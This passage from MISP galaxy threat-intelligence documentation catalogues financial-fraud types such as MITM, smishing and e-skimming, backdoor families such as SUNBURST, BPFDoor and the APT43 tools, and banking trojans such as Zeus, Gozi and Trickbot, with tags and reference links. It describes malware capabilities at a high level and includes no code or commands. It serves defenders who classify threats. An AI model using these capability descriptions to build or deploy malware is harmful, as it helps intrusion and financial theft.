In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other

The tag is: misp-galaxy:financial-fraud="MITM - Man-in-the-Middle Attack"

Table 593. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Transaction Reversal Fraud

Unauthorized physical manipulation of ATM cash withdrawal. Appears that cash has not been dispensed – a reversal message generated – SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="Transaction Reversal Fraud"

Table 594. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Transaction Message Adulteration

The data contained in an authorisation message is manipulated to try to fool the payment processor.

The tag is: misp-galaxy:financial-fraud="Transaction Message Adulteration"

Table 595. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

First Party (Friendly) Fraud

Fraud committed against a financial institution by one of its own customers

The tag is: misp-galaxy:financial-fraud="First Party (Friendly) Fraud"

Table 596. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Identity Spoofing (or entity hacking)

Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity

The tag is: misp-galaxy:financial-fraud="Identity Spoofing (or entity hacking)"

Table 597. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Authorised Push Payment Fraud

A form of fraud in which victims are manipulated into making real-time payments to fraudsters, typically by social engineering attacks involving impersonation.

The tag is: misp-galaxy:financial-fraud="Authorised Push Payment Fraud"

Table 598. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Direct Debit Fraud

Direct debit fraud can take place in several ways. It is often associated with identity theft, where the scammer gains access to the bank account information by posing as the victim. They can pay for services and products via a direct debit option and use this account until its owner notices.

The tag is: misp-galaxy:financial-fraud="Direct Debit Fraud"

Table 599. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Extortion

Obtaining benefit through coercion

The tag is: misp-galaxy:financial-fraud="Extortion"

Table 600. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Smishing

Also known as "SMS Phishing", is a form of criminal activity using social engineering techniques. SMS phishing uses cell phone text messages to deliver information and/or requests to induce people to divulge or to take action that will compromise their personal or confidential information.

The tag is: misp-galaxy:financial-fraud="Smishing"

Table 601. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Shoulder Surfing

Technique used to obtain information such as personal identification numbers (PINs), passwords and other confidential data by looking over the victim’s shoulder

The tag is: misp-galaxy:financial-fraud="Shoulder Surfing"

Table 602. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Distraction

The process of diverting the attention of an individual or group from a desired area of focus and thereby blocking or diminishing the reception of desired information.

The tag is: misp-galaxy:financial-fraud="Distraction"

Table 603. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Push Payments

Authorised push payment fraud happens when fraudsters deceive consumers or individuals at a business to send them a payment under false pretences to a bank account controlled by the fraudster. As payments made using real-time payment schemes are irrevocable, the victims cannot reverse a payment once they realise they have been conned.

The tag is: misp-galaxy:financial-fraud="Push Payments"

Table 604. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

ATM Malware

Unauthorised software, or authorises software run in an unauthorized manner on ATM PC - SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="ATM Malware"

Table 605. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Data Breach

A data breach is a security incident in which sensitive, protected or confidential data is copied, transmitted, viewed, stolen or used from a PC or Computer Network by an entity unauthorised to do so.

The tag is: misp-galaxy:financial-fraud="Data Breach"

Table 606. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Ransomware

A type of malicious software designed to block access to a computer system until a sum of money is paid

The tag is: misp-galaxy:financial-fraud="Ransomware"

Table 607. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Fake Website

A website that is not a legitimate venue, the site is designed to entice the visitor into revealing sensitive information, to download some form of malware or to purchase products that never arrive

The tag is: misp-galaxy:financial-fraud="Fake Website"

Table 608. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Fake App

Apps in mobile devices that trick users into downloading them. They may also pose as quirky and attractive apps, providing interesting services. Once installed on a mobile device, fake apps can perform a variety of malicious routines.

The tag is: misp-galaxy:financial-fraud="Fake App"

Table 609. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

e-Skimming

Cyber criminals introduce skimming code on e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control.

The tag is: misp-galaxy:financial-fraud="e-Skimming"

Table 610. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Skimming - CPP UPT

CPP analysis identifies Payment Terminal parking, transport, fuel, etc. locations, from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.

The tag is: misp-galaxy:financial-fraud="Skimming - CPP UPT"

Table 611. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Skimming - CPP Virtual Terminal

Same as e-Skimming

The tag is: misp-galaxy:financial-fraud="Skimming - CPP Virtual Terminal"

Table 612. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Card Trapping

Unauthorized physical ATM manipulation, preventing card from being returned to customer - SEE FULL TERMINAL FRAUD DEFINITION

The tag is: misp-galaxy:financial-fraud="Card Trapping"

Table 613. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Lack of Patching / Security

Patch management is the best practice of upgrading existing software applications to remove any weak security patches that could be exploited by hackers. Lack of proper patching allows cyber criminals to exploit systems and networks.

The tag is: misp-galaxy:financial-fraud="Lack of Patching / Security"

Table 614. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Bad implementation

Process where an information system is deployed into a Production Environed with faults, errors or vulnerabilities

The tag is: misp-galaxy:financial-fraud="Bad implementation"

Table 615. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Deployment Error

Implementation of a system, solution or service not according to defined and tested best practices.

The tag is: misp-galaxy:financial-fraud="Deployment Error"

Table 616. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Merchant Negligence

Merchants not following best practice procedures to avoid criminal or fraudulent activity,

The tag is: misp-galaxy:financial-fraud="Merchant Negligence"

Table 617. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Implementation not according to Standards

Implementation of a sstem, solution or service not according to defined and tested standards

The tag is: misp-galaxy:financial-fraud="Implementation not according to Standards"

Table 618. Table References

Links

https://www.association-secure-transactions.eu/industry-information/fraud-definitions/

Backdoor

A list of backdoor malware..

Backdoor is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

raw-data

WellMess

Cross-platform malware written in Golang, compatible with Linux and Windows. Although there are some minor differences, both variants have the same functionality. The malware communicates with a CnC server using HTTP requests and performs functions based on the received commands. Results of command execution are sent in HTTP POST requests data (RSA-encrypted). Main functionalities are: (1) Execute arbitrary shell commands, (2) Upload/Download files. The PE variant of the infection, in addition, executes PowerShell scripts. A .Net version was also observed in the wild.

The tag is: misp-galaxy:backdoor="WellMess"

WellMess has relationships with:

  • similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="likely"

Table 619. Table References

Links

https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Rosenbridge

The rosenbridge backdoor is a small, non-x86 core embedded alongside the main x86 core in the CPU. It is enabled by a model-specific-register control bit, and then toggled with a launch-instruction. The embedded core is then fed commands, wrapped in a specially formatted x86 instruction. The core executes these commands (which we call the 'deeply embedded instruction set'), bypassing all memory protections and privilege checks.

While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems, allowing any unprivileged code to modify the kernel.

The rosenbridge backdoor is entirely distinct from other publicly known coprocessors on x86 CPUs, such as the Management Engine or Platform Security Processor; it is more deeply embedded than any known coprocessor, having access to not only all of the CPU’s memory, but its register file and execution pipeline as well.

The tag is: misp-galaxy:backdoor="Rosenbridge"

Table 620. Table References

Links

https://www.bleepingcomputer.com/news/security/backdoor-mechanism-discovered-in-via-c3-x86-processors/

https://github.com/xoreaxeaxeax/rosenbridge

https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Christopher%20Domas/DEFCON-26-Christopher-Domas-GOD-MODE-%20UNLOCKED-hardware-backdoors-in-x86-CPUs.pdf

ServHelper

The purpose of the macro was to download and execute a variant of ServHelper that set up reverse SSH tunnels that enabled access to the infected host through the Remote Desktop Protocol (RDP) port 3389.

"Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit," researchers from Proofpoint explain in an analysis released today.

The other ServHelper variant does not include the tunneling and hijacking capabilities and functions only as a downloader for the FlawedGrace RAT.

The tag is: misp-galaxy:backdoor="ServHelper"

Table 621. Table References

Links

https://www.bleepingcomputer.com/news/security/new-servhelper-backdoor-and-flawedgrace-rat-pushed-by-necurs-botnet/

Rising Sun

The Rising Sun backdoor uses the RC4 cipher to encrypt its configuration data and communications. As with most backdoors, on initial infection, Rising Sun will send data regarding the infected system to a command and control (C2) site. That information captures computer and user name, IP address, operating system version and network adapter information. Rising Sun contains 14 functions including executing commands, obtaining information on disk drives and running processes, terminating processes, obtaining file creation and last access times, reading and writing files, deleting files, altering file attributes, clearing the memory of processes and connecting to a specified IP address.

The tag is: misp-galaxy:backdoor="Rising Sun"

Table 622. Table References

Links

https://www.bluvector.io/threat-report-rising-sun-operation-sharpshooter/

SLUB

A new backdoor was observed using the Github Gist service and the Slack messaging system as communication channels with its masters, as well as targeting a very specific type of victim using a watering hole attack. The backdoor dubbed SLUB by the Trend Micro Cyber Safety Solutions Team who detected it in the wild is part of a multi-stage infection process designed by capable threat actors who programmed it in C++. SLUB uses statically-linked curl, boost, and JsonCpp libraries for performing HTTP request, "extracting commands from gist snippets," and "parsing Slack channel communication." The campaign recently observed by the Trend Micro security researchers abusing the Github and Slack uses a multi-stage infection process.

The tag is: misp-galaxy:backdoor="SLUB"

SLUB has relationships with:

  • similar: misp-galaxy:tool="SLUB Backdoor" with estimative-language:likelihood-probability="likely"

Table 623. Table References

Links

https://www.bleepingcomputer.com/news/security/new-slub-backdoor-uses-slack-github-as-communication-channels/

Asruex

Since it first emerged in 2015, Asruex has been known for its backdoor capabilities and connection to the spyware DarkHotel. However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.

The tag is: misp-galaxy:backdoor="Asruex"

Table 624. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/

FlowerPippi

The tag is: misp-galaxy:backdoor="FlowerPippi"

Table 625. Table References

Links

https://securityintelligence.com/news/ta505-delivers-new-gelup-malware-tool-flowerpippi-backdoor-via-spam-campaign/

Speculoos

FreeBSD-based payload, Speculoos was delivered by exploiting CVE-2019-19781, a vulnerability affecting the Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliances that allowed an adversary to remotely execute arbitrary commands. This vulnerability was first disclosed on December 17, 2019 via security bulletin CTX267679 which contained several mitigation recommendations. By January 24, 2020, permanent patches for the affected appliances were issued. Based on the spread of industries and regions, in addition to the timing of the vulnerability disclosure, we believe this campaign may have been more opportunistic in nature compared to the highly targeted attack campaigns that are often associated with these types of adversaries. However, considering the exploitation of the vulnerability in conjunction with delivery of a backdoor specifically designed to execute on the associated FreeBSD operating system indicates the adversary was absolutely targeting the affected devices.

The tag is: misp-galaxy:backdoor="Speculoos"

Speculoos has relationships with:

  • used-by: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="very-likely"

Table 626. Table References

Links

https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

Mori Backdoor

Mori Backdoor has been used by Seedworm.

The tag is: misp-galaxy:backdoor="Mori Backdoor"

Table 627. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

BazarBackdoor

Something that made the brute-force attacks on RDP connections easier was a new module of the notorious Trojan, TrickBot. It now seems that the TrickBot developers have a new tactic. Cybersecurity researchers have discovered a new phishing campaign that delivers a stealthy backdoor called BazarBackdoor, which can be used to compromise and gain full access to corporate networks. As is the case with 91% of cyberattacks, this one starts with a phishing email. A range of subjects are used to personalize the emails: Customer complaints, coronavirus-themed payroll reports, or employee termination lists. All these emails contain links to documents hosted on Google Docs. To send the malicious emails, the cybercriminals use the marketing platform Sendgrid. This campaign uses spear phishing, which means that the perpetrators have made an effort to ensure that the websites sent in the emails seem legitimate and correspond to the emails subjects.

The tag is: misp-galaxy:backdoor="BazarBackdoor"

BazarBackdoor is also known as:

  • BEERBOT

  • KEGTAP

  • Team9Backdoor

  • bazaloader

  • bazarloader

  • bazaarloader

Table 628. Table References

Links

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://www.pandasecurity.com/en/mediacenter/business/bazarbackdoor-trickbot-backdoor/

SUNBURST

Backdoor.Sunburst is Malwarebytes’ detection name for a trojanized update to SolarWind’s Orion IT monitoring and management software.

The tag is: misp-galaxy:backdoor="SUNBURST"

SUNBURST is also known as:

  • Solarigate

SUNBURST has relationships with:

  • dropped-by: misp-galaxy:tool="SUNSPOT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 629. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.varonis.com/blog/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/

https://blog.malwarebytes.com/detections/backdoor-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant

The tag is: misp-galaxy:backdoor="BPFDoor"

Table 630. Table References

Links

https://troopers.de/troopers22/talks/7cv8pz/

https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896?gi=1effe9eb6507

https://twitter.com/cyb3rops/status/1523227511551033349

https://twitter.com/CraigHRowland/status/1523266585133457408

BOLDMOVE

According to Mandiant, this malware family is attributed to potential chinese background and its Linux variant is related to exploitation of Fortinet’s SSL-VPN (CVE-2022-42475).

The tag is: misp-galaxy:backdoor="BOLDMOVE"

Table 631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove

https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

PowerMagic

The tag is: misp-galaxy:backdoor="PowerMagic"

Table 632. Table References

Links

https://securelist.com/bad-magic-apt/109087/

VEILEDSIGNAL

VEILEDSIGNAL is a backdoor written in C that is able to execute shellcode and terminate itself. Additionally, VEILEDSIGNAL relies on additional modules that connect via Windows named pipes to interact with the Command and Control(C2) infrastructure.

The tag is: misp-galaxy:backdoor="VEILEDSIGNAL"

Table 633. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

POOLRAT

POOLRAT is a C/C++ macOS backdoor capable of collecting basic system information and executing commands. The commands performed include running arbitrary commands, secure deleting files, reading and writing files, updating the configuration.

The tag is: misp-galaxy:backdoor="POOLRAT"

Table 634. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

BIGRAISIN

BIGRAISIN is a C\C++ Windows based backdoor. It is capable of executing downloaded commands, executing downloaded files, and deleting files. Availability: Non-public

The tag is: misp-galaxy:backdoor="BIGRAISIN"

BIGRAISIN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 635. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

FASTFIRE

FASTFIRE is a malicious APK that connects to a server and sends details of the compromised device back to command and control (C2). Availability: Non-public

The tag is: misp-galaxy:backdoor="FASTFIRE"

FASTFIRE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 636. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GRAYZONE

GRAYZONE is a C/C++ Windows backdoor capable of collecting system information, logging keystrokes, and downloading additional stages from the C2 server. Availability: Non-public

The tag is: misp-galaxy:backdoor="GRAYZONE"

GRAYZONE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 637. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

HANGMAN.V2

HANGMAN.V2 is a variant of the backdoor HANGMAN. HANGMAN.V2 is very similar to HANGMAN, but uses HTTP for the network communications and formats data passed to the C2 server differently. Availability: Non-public

The tag is: misp-galaxy:backdoor="HANGMAN.V2"

HANGMAN.V2 has relationships with:

  • variant-of: misp-galaxy:malpedia="HOPLIGHT" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 638. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LOGCABIN

LOGCABIN is a file-less and modular backdoor with multiple stages. The stages consist of several VisualBasic and PowerShell scripts that are downloaded and executed. LOGCABIN collects detailed system information and sends it to the C2 before performing additional commands. Availability: Non-public

The tag is: misp-galaxy:backdoor="LOGCABIN"

LOGCABIN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 639. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SOURDOUGH

SOURDOUGH is a backdoor written in C that communicates via HTTP. Its capabilities include keylogging, screenshot capture, file transfer, file execution, and directory enumeration. Availability: Non-public

The tag is: misp-galaxy:backdoor="SOURDOUGH"

SOURDOUGH has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 640. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

TROIBOMB

TROIBOMB is a C/C++ Windows backdoor that is capable of collecting system information and performing commands from the C2 server. Availability: Non-public

The tag is: misp-galaxy:backdoor="TROIBOMB"

TROIBOMB has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 641. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

ZIPLINE

ZIPLINE makes use of extensive functionality to ensure the authentication of its custom protocol used to establish command and control (C2).

The tag is: misp-galaxy:backdoor="ZIPLINE"

Table 642. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

Banker

A list of banker malware..

Banker is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Unknown - raw-data

Zeus

Zeus is a trojan horse that is primarily delivered via drive-by-downloads, malvertising, exploit kits and malspam campaigns. It uses man-in-the-browser keystroke logging and form grabbing to steal information from victims. Source was leaked in 2011.

The tag is: misp-galaxy:banker="Zeus"

Zeus is also known as:

  • Zbot

Zeus has relationships with:

  • similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:botnet="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 643. Table References

Links

https://usa.kaspersky.com/resource-center/threats/zeus-virus

Vawtrak

Delivered primarily by exploit kits as well as malspam campaigns utilizing macro based Microsoft Office documents as attachments. Vawtrak/Neverquest is a modularized banking trojan designed to steal credentials through harvesting, keylogging, Man-In-The-Browser, etc.

The tag is: misp-galaxy:banker="Vawtrak"

Vawtrak is also known as:

  • Neverquest

Vawtrak has relationships with:

  • similar: misp-galaxy:tool="Vawtrak" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Vawtrak" with estimative-language:likelihood-probability="likely"

Table 644. Table References

Links

https://www.kaspersky.com/blog/neverquest-trojan-built-to-steal-from-hundreds-of-banks/3247/

https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving

https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows

https://www.botconf.eu/wp-content/uploads/2016/11/2016-Vawtrak-technical-report.pdf

Dridex

Dridex leverages redirection attacks designed to send victims to malicious replicas of the banking sites they think they're visiting.

The tag is: misp-galaxy:banker="Dridex"

Dridex is also known as:

  • Feodo Version D

  • Cridex

Dridex has relationships with:

  • similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

Table 645. Table References

Links

https://blog.malwarebytes.com/detections/trojan-dridex/

https://feodotracker.abuse.ch/

Gozi

Banking trojan delivered primarily via email (typically malspam) and exploit kits. Gozi 1.0 source leaked in 2010

The tag is: misp-galaxy:banker="Gozi"

Gozi is also known as:

  • Ursnif

  • CRM

  • Snifula

  • Papras

Gozi has relationships with:

  • similar: misp-galaxy:tool="Snifula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 646. Table References

Links

https://www.secureworks.com/research/gozi

https://www.gdatasoftware.com/blog/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007

https://lokalhost.pl/gozi_tree.txt

Goziv2

Banking trojan attributed to Project Blitzkrieg targeting U.S. Financial institutions.

The tag is: misp-galaxy:banker="Goziv2"

Goziv2 is also known as:

  • Prinimalka

Table 647. Table References

Links

https://krebsonsecurity.com/tag/gozi-prinimalka/

https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/

https://lokalhost.pl/gozi_tree.txt

Gozi ISFB

Banking trojan based on Gozi source. Features include web injects for the victims’ browsers, screenshoting, video recording, transparent redirections, etc. Source leaked ~ end of 2015.

The tag is: misp-galaxy:banker="Gozi ISFB"

Gozi ISFB has relationships with:

  • similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 648. Table References

Links

https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak

https://lokalhost.pl/gozi_tree.txt

Dreambot

Dreambot is a variant of Gozi ISFB that is spread via numerous exploit kits as well as through malspam email attachments and links.

The tag is: misp-galaxy:banker="Dreambot"

Table 649. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

https://lokalhost.pl/gozi_tree.txt

IAP

Gozi ISFB variant

The tag is: misp-galaxy:banker="IAP"

IAP has relationships with:

  • similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 650. Table References

Links

https://lokalhost.pl/gozi_tree.txt

http://archive.is/I7hi8#selection-217.0-217.6

GozNym

GozNym hybrid takes the best of both the Nymaim and Gozi ISFB. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers.

The tag is: misp-galaxy:banker="GozNym"

Table 651. Table References

Links

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://lokalhost.pl/gozi_tree.txt

Zloader Zeus

Zloader is a loader that loads different payloads, one of which is a Zeus module. Delivered via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Zloader Zeus"

Zloader Zeus is also known as:

  • Zeus Terdot

Zloader Zeus has relationships with:

  • similar: misp-galaxy:malpedia="Zloader" with estimative-language:likelihood-probability="likely"

Table 652. Table References

Links

https://blog.threatstop.com/zloader/terdot-that-man-in-the-middle

https://www.scmagazine.com/terdot-zloaderzbot-combo-abuses-certificate-app-to-pull-off-mitm-browser-attacks/article/634443/

Zeus VM

Zeus variant that utilizes steganography in image files to retrieve configuration file.

The tag is: misp-galaxy:banker="Zeus VM"

Zeus VM is also known as:

  • VM Zeus

Zeus VM has relationships with:

  • similar: misp-galaxy:malpedia="VM Zeus" with estimative-language:likelihood-probability="likely"

Table 653. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/

https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/

Zeus Sphinx

Sphinx is a modular banking trojan that is a commercial offering sold to cybercriminals via underground fraudster boards.

The tag is: misp-galaxy:banker="Zeus Sphinx"

Zeus Sphinx has relationships with:

  • similar: misp-galaxy:malpedia="Zeus Sphinx" with estimative-language:likelihood-probability="likely"

Table 654. Table References

Links

https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/

Panda Banker

Zeus like banking trojan that is delivered primarily through malspam emails and exploit kits.

The tag is: misp-galaxy:banker="Panda Banker"

Panda Banker is also known as:

  • Zeus Panda

Table 655. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers

Zeus KINS

Zeus KINS is a modified version of ZeuS 2.0.8.9. It contains an encrypted version of it’s config in the registry.

The tag is: misp-galaxy:banker="Zeus KINS"

Zeus KINS is also known as:

  • Kasper Internet Non-Security

  • Maple

Zeus KINS has relationships with:

  • similar: misp-galaxy:malpedia="KINS" with estimative-language:likelihood-probability="likely"

Table 656. Table References

Links

https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/

https://github.com/nyx0/KINS

Chthonic

Chthonic according to Kaspersky is an evolution of Zeus VM. It uses the same encryptor as Andromeda bot, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.

The tag is: misp-galaxy:banker="Chthonic"

Chthonic is also known as:

  • Chtonic

Chthonic has relationships with:

  • similar: misp-galaxy:malpedia="Chthonic" with estimative-language:likelihood-probability="likely"

Table 657. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://securelist.com/chthonic-a-new-modification-of-zeus/68176/

Trickbot

Trickbot is a bot that is delivered via exploit kits and malspam campaigns. The bot is capable of downloading modules, including a banker module. Trickbot also shares roots with the Dyre banking trojan

The tag is: misp-galaxy:banker="Trickbot"

Trickbot is also known as:

  • Trickster

  • Trickloader

Trickbot has relationships with:

  • similar: misp-galaxy:tool="Trick Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

Table 658. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/

https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/

http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html

https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/

https://www.bleepingcomputer.com/news/security/trickbot-banking-trojan-starts-stealing-windows-problem-history/

Dyre

Dyre is a banking trojan distributed via exploit kits and malspam emails primarily. It has a modular architectur and utilizes man-in-the-browser functionality. It also leverages a backconnect server that allows threat actors to connect to a bank website through the victim’s computer.

The tag is: misp-galaxy:banker="Dyre"

Dyre is also known as:

  • Dyreza

Dyre has relationships with:

  • similar: misp-galaxy:mitre-malware="Dyre - S0024" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Dyre" with estimative-language:likelihood-probability="likely"

Table 659. Table References

Links

https://www.secureworks.com/research/dyre-banking-trojan

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

Tinba

Tinba is a very small banking trojan that hooks into browsers and steals login data and sniffs on network traffic. It also uses Man in The Browser (MiTB) and webinjects. Tinba is primarily delivered via exploit kits, malvertising and malspam email campaigns.

The tag is: misp-galaxy:banker="Tinba"

Tinba is also known as:

  • Zusy

  • TinyBanker

  • illi

Tinba has relationships with:

  • similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Tinba" with estimative-language:likelihood-probability="likely"

Table 660. Table References

Links

https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/

http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/

